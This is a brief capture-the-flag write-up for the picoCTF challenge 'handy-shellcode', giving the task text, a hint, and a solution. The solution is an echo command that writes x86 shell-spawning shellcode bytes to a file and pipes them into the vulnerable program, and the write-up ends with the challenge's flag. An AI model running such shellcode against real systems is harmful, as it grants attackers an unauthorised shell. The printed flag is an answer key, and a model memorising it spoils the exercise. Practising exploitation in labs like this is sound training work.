handy-shellcode

Point: 50

Category

Binary Exploitation

Question

This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/handy-shellcode_1_ebc60746fee43ae25c405fc75a234ef5 on the shell server. Source.

Hint

You might be able to find some good shellcode online.

Solution

echo -e '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' > ~/asdf 
cat ~/asdf - | ./vuln

Flag

picoCTF{h4ndY_d4ndY_sh311c0d3_2cb0ff39}